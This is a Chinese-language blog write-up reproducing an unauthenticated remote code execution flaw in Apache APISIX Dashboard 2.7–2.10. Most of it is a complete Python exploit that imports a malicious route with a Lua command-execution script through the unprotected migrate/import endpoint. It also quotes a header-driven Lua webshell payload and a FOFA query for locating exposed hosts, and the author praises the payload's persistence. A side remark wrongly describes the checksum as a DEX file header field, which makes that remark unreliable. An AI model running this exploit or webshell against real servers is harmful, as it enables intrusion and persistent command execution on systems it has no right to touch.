00x1漏洞环境

Apache APISIX Dashboard 2.7 - 2.10 版本受到影响

通过git拉取在docker搭建环境

git clone https://github.com/apache/apisix-docker

 

注意这里需要把yml文件改成2.7版本

 

 

 然后用docker搭建就可以了

 

 

00x2 攻击过程

 

环境跑起来后成功访问到9000登录界面

 

 

 

这里的未授权访问指的是对下面两个接口没有鉴权处理

/apisix/admin/migrate/export  
/apisix/admin/migrate/import 

 

用burp抓个包，访问export接口，可以看到返回了路由信息

 

 

 

 

这里不光光能返回路由的配置信息，还能import导入路由配置，

首先它的返回路由信息是一个Json，(因为这里的路由配置的script部分是我在复现的时候import的payload)

 

 

 

 

 

我们可以在官方文档里看到这些属性的作用

官方文档

 

 

 

 

 

如果我们在后台直接添加带有payload的路由配置，看看它会不会执行命令

 

 

 

直接访问创建的接口emlknW，这里需要访问管理端口9080，不是9000

 

 

 

可以看到成功挂载了 852文件，命令执行成功

 

 

 

那么要如何通过访问import接口来给他导入配置呢？

 

00x3 漏洞分析

 

通过参考网上别人的分析，因为是go语言 没学过就不多分析了

后端代码就是未对两个接口访问做鉴权，然后我们可以通过export得到的路由配置

自己构造一个恶意的路由配置，这里命令执行在script属性里面，然后通过构造好的配置import到里面去。

看代码分析知道可以有修改或者新建路由配置来完成。

 

 

关键的一点这里传入的配置需要计算文件的checksum，

简答了解一下：

checksum（校验和）是DEX位于文件头部的一个信息，用来判断DEX文件是否损坏或者被篡改，它位于头部的0x08偏移地址处，占用4个字节，采用小端序存储。

 

这里给出朋友改的代码：

import random, string, json, zlib, requests

"""
"script": "local file = io.popen(ngx.re.get_headers()['cmd'],'r') \n local output = file:read('*all') \n
file:close() \n ngx.say(output)q",
我的理解是 这是通过lua语言写的通过请求头带上的cmd: rce，来替换'cmd'部分来执行命令
"""

eval_config = {
    "Counsumers": [],
    "Routes": [
        {
            "id": str(random.randint(100000000000000000, 1000000000000000000)),
            "create_time": 1640674554,
            "update_time": 1640677637,
            "uris": [
                "/rce"
            ],
            "name": "rce",
            "methods": [
                "GET",
                "POST",
                "PUT",
                "DELETE",
                "PATCH",
                "HEAD",
                "OPTIONS",
                "CONNECT",
                "TRACE"
            ],
            "script": "os.execute('touch /tmp/mytest')",
            "status": 1
        }
    ],
    "Services": [],
    "SSLs": [],
    "Upstreams": [],
    "Scripts": [],
    "GlobalPlugins": [],
    "PluginConfigs": []
}


# 将数据进行checksum
def calc_crc(data):
    crc32 = zlib.crc32(data) & 0xffffffff
    return crc32.to_bytes(4, byteorder="big")


def import_apix(url, data):
    data = json.dumps(data).encode()  # 将数据进行转换为json存储到文件中，后面需要以文件上传
    checksum = calc_crc(data)  # 进行checksum ，然后添加到数据后面

    files = {"file": ("data", data + checksum, "text/data")}
    resp = requests.post(url + "/apisix/admin/migrate/import", files=files, proxies=proxies, verify=False)
    # proxies=proxies 这里是通过post去发包，走代理proxies
    if resp.json().get("code", -1) == 0:
        return True
    else:
        return False


"""
这里定义的proxies为本地代理，这样运行时候就能用burp抓包了
"""
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080"
}


# 生成一个随机路径
def random_str():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=6))


if __name__ == '__main__':

    uri = random_str()
    print(uri)
    eval_config["Routes"][0]["uris"] = ["/" + uri]
    eval_config["Routes"][0]["name"] = uri
    print(eval_config, end='\n')
    if import_apix('http://192.168.255.128:9000', eval_config):
        print("attack success")
        print("uri is: " + "/" + uri)
    else:
        print("attack error")

 

我们运行抓包看看，后面这个应该就是+上的checksum了，可以看到成功导入了配置

 

 

我们在py里输出了随机生成的命名uri

 

 

 

 

直接去访问该API

 

 

 

 

回到环境看看，成功RCE了

 

 

 

 

在github上有大佬写的是带回显的可以执行多次命令的接口配置，可以看看

https://github.com/wuppp/cve-2021-45232-exp#readme

 

代码关键就是

 "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
           

我的理解是 这是通过lua语言写的通过读取请求头带上的cmd: rce，来替换'cmd'部分来执行命令

 

所以import这种配置成功后，就可以这样执行命令了

 

 

 

 

 

 不得不说这更加有持久性 evil~

 

在fofa里面可以这样来搜索，使用该组件的主机

title="Apache APISIX Dashboard"

 

00x4 修复方案

更新到最新版本，新版本代理做了鉴权处理

 

参考：

https://www.cnblogs.com/xiaozhi789/articles/15763472.html